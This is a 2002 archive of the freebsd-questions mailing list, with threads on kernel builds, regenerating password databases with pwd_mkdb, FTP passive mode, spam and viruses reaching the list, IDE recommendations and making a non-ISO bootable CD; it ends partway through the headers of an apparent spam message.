Bjarne Wichmann Petersen Subject: Re: Kernelbuild "the new way" (Was: APM not even a sign) Date: Sun, 23 Jun 2002 15:07:03 -0500 User-Agent: KMail/1.4.1 Cc: freebsd-questions@FreeBSD.ORG References: <200206221620.45619.dsyphers@uchicago.edu> <20020623061651.61CE9263871@pfepc.post.tele.dk> In-Reply-To: <20020623061651.61CE9263871@pfepc.post.tele.dk> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206231507.03183.dsyphers@uchicago.edu> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sunday 23 June 2002 01:17 am, Bjarne Wichmann Petersen wrote: > On Saturday 22 June 2002 23:20, David Syphers wrote: > > > > I belive the "new way" is _only_ for when you're upgrading the entire > > system - it's for use between buildworld and installworld. The "old way" > > is still the way for when you're just building your kernel. > > Well, I think Handbook is a bit vague on this. It does say that "the old way" > should be used when the source haven't been updated. But since I alway cvsup > my sourcetree prior to a kernelbuild (and subsequent make world) this really > doesn't apply. "The new way" should be fine for me, but alas, isn't. It's not clear what order you're doing things in. If you cvsup, then follow the buildworld - buildkernel - installkernel - installworld route, that should work fine, and there's something wrong if it doesn't. But you can't build a new kernel and install that, and _then_ buildworld. All sorts of nasty problems can arise from kernel and world being out of sync. This route of doing things has never been supported. The "old way" is now only for situations like where you want to add a device or a kernel option to a system, but don't want to upgrade the system to a later version. -David -- Everyone who believes in telekinesis, raise my hand... Astronomy and Astrophysics Center The University of Chicago To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:24:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cliff.mfn.org (cliff.mfn.org [204.238.179.8]) by hub.freebsd.org (Postfix) with ESMTP id C164C37B400 for ; Sun, 23 Jun 2002 13:24:07 -0700 (PDT) Received: from greeves.mfn.org (greeves.mfn.org [204.238.179.37]) by cliff.mfn.org (8.11.1/8.9.3) with ESMTP id g5NKO1240278 for ; Sun, 23 Jun 2002 15:24:02 -0500 (CDT) (envelope-from measl@mfn.org) Date: Sun, 23 Jun 2002 15:24:01 -0500 (CDT) From: To: freebsd-questions@freebsd.org Subject: 4.6 vs root passwd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Good Morning, I spent most of yesterday building a new 4.6 box to replace our 4.2 web server. As part of the "finishing touches", I moved over the old passwd and master.passwd files from the old to the new box. Incredibly, the root password has not changed, and the box refuses to ack the "old" accounts as valid. What am I missing here? I desperately want to avoid moving 600+ accounts over one at a time... Please reply directly, as I am not subscribed. Thanks! -- Yours, J.A. Terranson sysadmin@mfn.org If Governments really want us to behave like civilized human beings, they should give serious consideration towards setting a better example: Ruling by force, rather than consensus; the unrestrained application of unjust laws (which the victim-populations were never allowed input on in the first place); the State policy of justice only for the rich and elected; the intentional abuse and occassionally destruction of entire populations merely to distract an already apathetic and numb electorate... This type of demogoguery must surely wipe out the fascist United States as surely as it wiped out the fascist Union of Soviet Socialist Republics. The views expressed here are mine, and NOT those of my employers, associates, or others. Besides, if it *were* the opinion of all of those people, I doubt there would be a problem to bitch about in the first place... -------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:26:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id BE39F37B404 for ; Sun, 23 Jun 2002 13:26:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5NKQIjh072246; Sun, 23 Jun 2002 15:26:18 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: 4.6 vs root passwd From: Larry Rosenman To: measl@mfn.org Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 23 Jun 2002 15:26:18 -0500 Message-Id: <1024863978.69414.21.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 2002-06-23 at 15:24, measl@mfn.org wrote: > > Good Morning, > > I spent most of yesterday building a new 4.6 box to replace our 4.2 > web server. As part of the "finishing touches", I moved over the old passwd > and master.passwd files from the old to the new box. Incredibly, the root > password has not changed, and the box refuses to ack the "old" accounts as > valid. > > What am I missing here? PWD_MKDB(8) FreeBSD System Manager's Manual PWD_MKDB(8) NAME pwd_mkdb - generate the password databases SYNOPSIS pwd_mkdb [-C] [-N] [-p] [-d directory] [-s cachesize] [-u username] file > > I desperately want to avoid moving 600+ accounts over one at a > time... > > Please reply directly, as I am not subscribed. > > Thanks! > > -- > Yours, > J.A. Terranson > sysadmin@mfn.org > > If Governments really want us to behave like civilized human beings, they > should give serious consideration towards setting a better example: > Ruling by force, rather than consensus; the unrestrained application of > unjust laws (which the victim-populations were never allowed input on in > the first place); the State policy of justice only for the rich and > elected; the intentional abuse and occassionally destruction of entire > populations merely to distract an already apathetic and numb electorate... > This type of demogoguery must surely wipe out the fascist United States > as surely as it wiped out the fascist Union of Soviet Socialist Republics. > > The views expressed here are mine, and NOT those of my employers, > associates, or others. Besides, if it *were* the opinion of all of > those people, I doubt there would be a problem to bitch about in the > first place... > -------------------------------------------------------------------- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:32:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cliff.mfn.org (cliff.mfn.org [204.238.179.8]) by hub.freebsd.org (Postfix) with ESMTP id 4617737B42C for ; Sun, 23 Jun 2002 13:32:05 -0700 (PDT) Received: from greeves.mfn.org (greeves.mfn.org [204.238.179.37]) by cliff.mfn.org (8.11.1/8.9.3) with ESMTP id g5NKW0240309; Sun, 23 Jun 2002 15:32:00 -0500 (CDT) (envelope-from measl@mfn.org) Date: Sun, 23 Jun 2002 15:31:59 -0500 (CDT) From: To: Larry Rosenman Cc: freebsd-questions@FreeBSD.ORG Subject: Re: 4.6 vs root passwd In-Reply-To: <1024863978.69414.21.camel@lerlaptop> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Duh.. I should know better than to stay up all night doing these stupid upgrades... Thanks! On 23 Jun 2002, Larry Rosenman wrote: > On Sun, 2002-06-23 at 15:24, measl@mfn.org wrote: > > > > Good Morning, > > > > I spent most of yesterday building a new 4.6 box to replace our 4.2 > > web server. As part of the "finishing touches", I moved over the old passwd > > and master.passwd files from the old to the new box. Incredibly, the root > > password has not changed, and the box refuses to ack the "old" accounts as > > valid. > > > > What am I missing here? > PWD_MKDB(8) FreeBSD System Manager's Manual > PWD_MKDB(8) > > NAME > pwd_mkdb - generate the password databases > > SYNOPSIS > pwd_mkdb [-C] [-N] [-p] [-d directory] [-s cachesize] [-u username] > file > > > > > > I desperately want to avoid moving 600+ accounts over one at a > > time... > > > > Please reply directly, as I am not subscribed. > > > > Thanks! > > > > -- > > Yours, > > J.A. Terranson > > sysadmin@mfn.org > > > > If Governments really want us to behave like civilized human beings, they > > should give serious consideration towards setting a better example: > > Ruling by force, rather than consensus; the unrestrained application of > > unjust laws (which the victim-populations were never allowed input on in > > the first place); the State policy of justice only for the rich and > > elected; the intentional abuse and occassionally destruction of entire > > populations merely to distract an already apathetic and numb electorate... > > This type of demogoguery must surely wipe out the fascist United States > > as surely as it wiped out the fascist Union of Soviet Socialist Republics. > > > > The views expressed here are mine, and NOT those of my employers, > > associates, or others. Besides, if it *were* the opinion of all of > > those people, I doubt there would be a problem to bitch about in the > > first place... > > -------------------------------------------------------------------- > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > -- Yours, J.A. Terranson sysadmin@mfn.org If Governments really want us to behave like civilized human beings, they should give serious consideration towards setting a better example: Ruling by force, rather than consensus; the unrestrained application of unjust laws (which the victim-populations were never allowed input on in the first place); the State policy of justice only for the rich and elected; the intentional abuse and occassionally destruction of entire populations merely to distract an already apathetic and numb electorate... This type of demogoguery must surely wipe out the fascist United States as surely as it wiped out the fascist Union of Soviet Socialist Republics. The views expressed here are mine, and NOT those of my employers, associates, or others. Besides, if it *were* the opinion of all of those people, I doubt there would be a problem to bitch about in the first place... -------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:33:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 4238337B40D for ; Sun, 23 Jun 2002 13:33:40 -0700 (PDT) Received: from hades.hell.gr (patr530-b171.otenet.gr [212.205.244.179]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5NKXbFr025538 for ; Sun, 23 Jun 2002 23:33:38 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5NJ34Im042615 for ; Sun, 23 Jun 2002 22:03:04 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5NJ34YD042614; Sun, 23 Jun 2002 22:03:04 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Sun, 23 Jun 2002 22:03:03 +0300 From: Giorgos Keramidas To: Per olof Ljungmark Cc: freebsd-questions Subject: Re: confused over ftp access from FBSD client Message-ID: <20020623190303.GA36974@hades.hell.gr> References: <3D15E2E9.9040708@intersonic.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D15E2E9.9040708@intersonic.se> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-23 17:02 +0000, Per olof Ljungmark wrote: > We have a FBSD ftp server connected to the net through a OpenBSD > firewall. What confuses me is that we never have a problem > connecting from various win clients, but from a FreeBSD or OpenBSD > client we have to issue a 'pas' (turning passive mode off) command > to get a directory listing or transfer. When you are behind a gateway that does NAT (network address translation) I would expect that you have to turn passive mode ON instead of OFF, as you seem to be hinting at above. This can be easily done in any sufficiently modern FTP client, and you can even set the default to passive mode for the stock FTP client of FreeBSD by making sure your environment contains: FTP_PASSIVE_MODE=YES - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:36:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id F216537B401 for ; Sun, 23 Jun 2002 13:36:22 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5NKaHjh072327; Sun, 23 Jun 2002 15:36:18 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: 4.6 vs root passwd From: Larry Rosenman To: measl@mfn.org Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 23 Jun 2002 15:36:17 -0500 Message-Id: <1024864578.69414.23.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 2002-06-23 at 15:31, measl@mfn.org wrote: > > Duh.. I should know better than to stay up all night doing these stupid > upgrades... > > Thanks! > Hey, we've all been there. Not a problem. LER -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:47:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from valis.olywa.net (valis.olywa.net [216.173.192.2]) by hub.freebsd.org (Postfix) with ESMTP id 7C0F137B403 for ; Sun, 23 Jun 2002 13:47:40 -0700 (PDT) Received: from intrepid.snowpoint.com ([216.173.213.173]) by valis.olywa.net (Post.Office MTA v3.5.3 release 223 ID# 0-56662U5000L500S0V35) with ESMTP id net for ; Sun, 23 Jun 2002 13:47:34 -0700 Received: from ([216.173.213.172]) by intrepid.snowpoint.com (Merak 4.10.020) with SMTP id HUB36795; Sun, 23 Jun 2002 13:42:52 -0700 From: "Corey Snow" To: questions@FreeBSD.ORG, pjklist@ekahuna.com Date: Sun, 23 Jun 2002 13:47:40 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Cc: Ruben de Groot Message-ID: <3D15D17C.26108.158E3FFA@localhost> References: In-reply-to: <20020623122518970.AAA709@empty1.ekahuna.com@pc02.ekahuna.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 5:25, Philip J. Koenig wrote: > > In the ultimate irony (or perhaps more accurately, in the ultimate > obviousness), the message that immediately followed Ruben's in the > last digest, and which took up fully 70% of the entire digest, was > yet another spam, complete with a nice big file attachment. > I have to voice my agreement with the "lock it down or lock it out" mentality. I think it's great that the FreeBSD lists are open for posting by anyone, but my opinion is that for such a service to exist (and don't get me wrong, I think it's a great service, and indicative of the level the FreeBSD community is willing to go to to support their platfrom) it must be balanced with some more granular administration. I'd recommend that more admins be assigned or roped into the administration of the list. The list shouldn't be moderated but there should be a faster response when something like this happens- if a single virus is sent to the list from some hapless bastard's hacked/infected machine, that probably shouldn't induce a LARTing- after all, he or she has to clean up the mess on their machine themseleves, and I think we can be tolerant of the occasional problem. But about the third virus sent from the "Jan Van Der Berg" account at xs4all.nl should have been responded to with a blackholing of at least that account if not the entire domain until such time as the issue was resolved. That indicates to me that we need more administration presence, because it isn't realistic to assume that a single or small group of admins are going to be continuously monitoring the list. Nor is it fair to expect that, because they're not getting paid. :) I very nearly unsubscribed because of the volume of mail I was getting. It wasn't going to overwhelm my servers or anything but it was really aggravating. I'm sure that a number of other people simply dropped their subscriptions, which doesn't help the FreeBSD community at all. Anyway, just my opinions. I've only been on the list and running FreeBSD for a couple of weeks now, so take that for what it's worth. :-) Corey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:51:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id DD61737B400 for ; Sun, 23 Jun 2002 13:51:40 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5NKpQjh072471; Sun, 23 Jun 2002 15:51:26 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: Spam problem on the list (Was: Re: URGENT) From: Larry Rosenman To: Corey Snow Cc: questions@FreeBSD.ORG, pjklist@ekahuna.com, Ruben de Groot In-Reply-To: <3D15D17C.26108.158E3FFA@localhost> References: <3D15D17C.26108.158E3FFA@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 23 Jun 2002 15:51:26 -0500 Message-Id: <1024865486.69414.26.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 2002-06-23 at 15:47, Corey Snow wrote: > On 23 Jun 2002, at 5:25, Philip J. Koenig wrote: > > > > > In the ultimate irony (or perhaps more accurately, in the ultimate > > obviousness), the message that immediately followed Ruben's in the > > last digest, and which took up fully 70% of the entire digest, was > > yet another spam, complete with a nice big file attachment. > > > > I have to voice my agreement with the "lock it down or lock it out" > mentality. I think it's great that the FreeBSD lists are open for > posting by anyone, but my opinion is that for such a service to exist > (and don't get me wrong, I think it's a great service, and indicative > of the level the FreeBSD community is willing to go to to support > their platfrom) it must be balanced with some more granular > administration. [snip] The technology to virus scan and SPAM scan exists, and runs on FreeBSD. My question is why isn't it deployed on the hub.freebsd.org server(s)? I've gotten more virii this weekend to the FreeBSD lists I subscribe to than any other place. -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:52:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from valis.olywa.net (valis.olywa.net [216.173.192.2]) by hub.freebsd.org (Postfix) with ESMTP id 788F237B410 for ; Sun, 23 Jun 2002 13:52:47 -0700 (PDT) Received: from intrepid.snowpoint.com ([216.173.213.173]) by valis.olywa.net (Post.Office MTA v3.5.3 release 223 ID# 0-56662U5000L500S0V35) with ESMTP id net for ; Sun, 23 Jun 2002 13:52:46 -0700 Received: from ([216.173.213.172]) by intrepid.snowpoint.com (Merak 4.10.020) with SMTP id HUB36795; Sun, 23 Jun 2002 13:48:02 -0700 From: "Corey Snow" To: questions@FreeBSD.ORG, pjklist@ekahuna.com, "Corey Snow" Date: Sun, 23 Jun 2002 13:52:51 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Cc: Ruben de Groot Message-ID: <3D15D2B3.8531.1592FD99@localhost> In-reply-to: <3D15D17C.26108.158E3FFA@localhost> References: <20020623122518970.AAA709@empty1.ekahuna.com@pc02.ekahuna.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 13:47, Corey Snow wrote: As a post-script to my previous message- > I'd recommend that more admins be assigned or roped into the > administration of the list. The list shouldn't be moderated but there > should be a faster response when something like this happens- if a > single virus is sent to the list from some hapless bastard's > hacked/infected machine, that probably shouldn't induce a LARTing- > after all, he or she has to clean up the mess on their machine > themseleves, and I think we can be tolerant of the occasional problem. > I meant to add that I would be willing to help in this effort, as I'm sure a lot of others here would. I'm not one to point out that something needs changing and expect everyone else to do it. After all, this is "our house" in a manner of speaking, so I'd be willing to help keep it clean. Regards, Corey Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13:56:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from valis.olywa.net (valis.olywa.net [216.173.192.2]) by hub.freebsd.org (Postfix) with ESMTP id C1B0E37B400 for ; Sun, 23 Jun 2002 13:56:10 -0700 (PDT) Received: from intrepid.snowpoint.com ([216.173.213.173]) by valis.olywa.net (Post.Office MTA v3.5.3 release 223 ID# 0-56662U5000L500S0V35) with ESMTP id net for ; Sun, 23 Jun 2002 13:56:10 -0700 Received: from ([216.173.213.172]) by intrepid.snowpoint.com (Merak 4.10.020) with SMTP id HUB36795; Sun, 23 Jun 2002 13:51:29 -0700 From: "Corey Snow" To: Larry Rosenman Date: Sun, 23 Jun 2002 13:56:17 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Cc: freebsd-questions@freebsd.org Message-ID: <3D15D381.5846.1596237C@localhost> References: <3D15D17C.26108.158E3FFA@localhost> In-reply-to: <1024865486.69414.26.camel@lerlaptop> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 15:51, Larry Rosenman wrote: > The technology to virus scan and SPAM scan exists, and runs on FreeBSD. > My question is why isn't it deployed on the hub.freebsd.org server(s)? > I believe that the reason was mentioned in another email after the one you quoted- the hub.freebsd.org server is running at its capacity limit, and a hardware upgrade would be likely necessary to support virus scanning all the mail. That's understandable, so unless someone finds a way to provide additional hardware/money (and I can't at the moment) we need to look at other ways to accomplish our goal, which is to reduce the amount of spam/viruses to the list, or at least to limit the amount to a dull roar. :) > I've gotten more virii this weekend to the FreeBSD lists I subscribe to > than any other place. > Yeah, it was pretty ugly for a bit there. But it seems to be calmer now. I'm more interested in fixing the problem than the blame at this point. :) Regards, Corey Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14: 1:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tomts22-srv.bellnexxia.net (tomts22.bellnexxia.net [209.226.175.184]) by hub.freebsd.org (Postfix) with ESMTP id 1737937B401 for ; Sun, 23 Jun 2002 14:01:50 -0700 (PDT) Received: from YANGTX ([65.93.64.93]) by tomts22-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with SMTP id <20020623210143.XVBT25645.tomts22-srv.bellnexxia.net@YANGTX> for ; Sun, 23 Jun 2002 17:01:43 -0400 Message-ID: <000e01c21af9$7bbf03d0$0100a8c0@YANGTX> From: "Hongbin Yang" To: Subject: looking for tools for developers Date: Sun, 23 Jun 2002 17:03:54 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000B_01C21AD7.F48430F0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_000B_01C21AD7.F48430F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all,=20 Could you please recommend, base on your experiencs, an IDE C/C++ tool? It seems that there are many can be used on freebsd for developers. But = I don't=20 know which one is popular(famous). thx adv. yang ------=_NextPart_000_000B_01C21AD7.F48430F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi all,
 
Could you please recommend, base on = your=20 experiencs, an IDE C/C++ tool?
 
It seems that there are many can = be=20 used on freebsd for developers. But I don't=20
know which one is=20 popular(famous).
 
thx adv.
 
yang
------=_NextPart_000_000B_01C21AD7.F48430F0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14: 2:25 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id 4F41537B404 for ; Sun, 23 Jun 2002 14:02:02 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5NL1ujh072554; Sun, 23 Jun 2002 16:01:56 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: Spam problem on the list (Was: Re: URGENT) From: Larry Rosenman To: Corey Snow Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: <3D15D381.5846.1596237C@localhost> References: <3D15D17C.26108.158E3FFA@localhost> <3D15D381.5846.1596237C@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 23 Jun 2002 16:01:56 -0500 Message-Id: <1024866117.69414.29.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 2002-06-23 at 15:56, Corey Snow wrote: > On 23 Jun 2002, at 15:51, Larry Rosenman wrote: > > > The technology to virus scan and SPAM scan exists, and runs on FreeBSD. > > My question is why isn't it deployed on the hub.freebsd.org server(s)? > > > > I believe that the reason was mentioned in another email after the > one you quoted- the hub.freebsd.org server is running at its capacity > limit, and a hardware upgrade would be likely necessary to support > virus scanning all the mail. That's understandable, so unless someone > finds a way to provide additional hardware/money (and I can't at the > moment) we need to look at other ways to accomplish our goal, which > is to reduce the amount of spam/viruses to the list, or at least to > limit the amount to a dull roar. :) Where is the current hardware configuration posted, and what does the community expect it would take to implement the appropriate protection? I can donate something, and might be able to get others as well. I use FreeBSD *A LOT* and recommend it to my consulting/contract clients. > > > I've gotten more virii this weekend to the FreeBSD lists I subscribe to > > than any other place. > > > > Yeah, it was pretty ugly for a bit there. But it seems to be calmer > now. I'm more interested in fixing the problem than the blame at this > point. :) I agree. It's not a biggie, I have the virus scanning on my inbound mail server. -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14:12:48 2002 Delivered-To: freebsd-questions@freebsd.org Received: from violet.metron.com (indigo.metron.com [192.160.193.52]) by hub.freebsd.org (Postfix) with ESMTP id 3028C37B403 for ; Sun, 23 Jun 2002 14:12:43 -0700 (PDT) Received: from violet.metron.com (violet.metron.com [127.0.0.1]) by violet.metron.com (8.12.3/8.11.6) with ESMTP id g5NLCfZX016969 for ; Sun, 23 Jun 2002 14:12:42 -0700 (PDT) (envelope-from lou@metron.com) Received: (from lou@localhost) by violet.metron.com (8.12.3/8.12.3/Submit) id g5NLCfDh016968 for freebsd-questions@freebsd.org; Sun, 23 Jun 2002 14:12:41 -0700 (PDT) (envelope-from lou@metron.com) X-Authentication-Warning: violet.metron.com: lou set sender to lou@metron.com using -f Date: Sun, 23 Jun 2002 14:12:40 -0700 From: Lou Katz To: freebsd-questions@freebsd.org Subject: How to make a bootable, NON-ISO CD Message-ID: <20020623141240.A16912@metron.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I would like to make a CD that can be booted in an X86, but which does not have an ISO9660 file system on it. I have established the following: I can make a FreeBSD filesystem via a loopback device. DD the file to cdrecord. This will make a perfectly good CD which can be mounted read only. I can boot to this from a floppy. I can also make an El-Torito bootable ISO9660 CD with the above. What I want to do (mostly for some slight security-through- obscurity) is to make a bootable CD with some other filesystem instead of ISO9660, so that it is not trivially mountable on Windows machines. So, does anyone know how to do this? Having two filesystems on the CD (an minimal El-Torrito ISO9660) which can be booted and then mount the rest of the CD is OK. It is possible that there is no way - I just want to know. Thanks to all. -- -=[L]=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14:31:24 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hub.FreeBSD.org (host-64-110-76-192.interpacket.net [64.110.76.192]) by hub.freebsd.org (Postfix) with SMTP id 754B037B401 for ; Sun, 23 Jun 2002 14:31:14 -0700 (PDT) From: "BARR. BELLO MUSA" Date: Sun, 23 Jun 2002 22:39:30 To: freebsd-questions@FreeBSD.org Subject: URGENT MIME-Version: 1.0 Content-Type: text/plain;charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <20020623213114.754B037B401@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web 